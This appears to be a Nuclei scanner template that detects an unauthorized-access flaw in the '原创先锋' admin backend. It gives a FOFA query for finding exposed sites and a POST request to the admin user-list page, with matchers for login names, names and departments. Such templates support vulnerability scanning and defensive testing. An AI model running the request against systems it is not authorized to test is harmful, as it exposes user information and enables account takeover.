id: yuanchuangxianfeng-admin-unauthorized

info:
  name: 原创先锋 后台管理未授权访问
  author: unknown
  severity: high
  description: |-
    fofa: body="https://www.bjycxf.com"
    原创先锋 后台管理存在未授权访问漏洞，攻击者可利用漏洞获取当前系统用户信息，甚至可以自己添加用户登录系统。

  tags: unauthorized
  
http:
  - raw:
      - |
        POST /admin/admin/admin_list.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}
    redirects: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '登录名'
          - '姓名'
          - '部门'
          - 'ID'
          - '共有数据'
        condition: and
      - type: status
        status: 
          - 200